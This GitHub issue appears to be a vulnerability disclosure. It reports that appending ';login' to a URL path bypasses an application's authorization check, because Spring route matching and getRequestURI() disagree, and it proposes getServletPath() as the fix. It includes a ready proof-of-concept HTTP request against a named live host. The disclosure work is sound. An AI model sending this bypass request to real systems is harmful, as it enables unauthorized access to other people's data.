Permission bypass can lead to unauthorized access

**Vulnerability Description**: The Spring routing parser ignores any content after ; in the URL (e.g., /;login) when looking up routes, but request.getRequestURI() retrieves the full URI path. This can lead to permission bypasses and unauthorized operations.
**Fix Proposal**: Use request.getServletPath() to obtain the path.
**/api/v1.0/statistics/recentDocs/;login**

![image](https://github.com/user-attachments/assets/5ba80afe-2813-4bff-b4e4-bee097b7a99a)

```
GET /api/v1.0/statistics/recentDocs/;login HTTP/1.1
Host: alldocs.tech
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: eyJhbGciO
Username: admin123
Referer: https://alldocs.tech/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
```

![image](https://github.com/user-attachments/assets/c5b34c84-20bc-4c1f-8cef-6e67579b09c0)



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Permission bypass can lead to unauthorized access #30

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Permission bypass can lead to unauthorized access #30

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions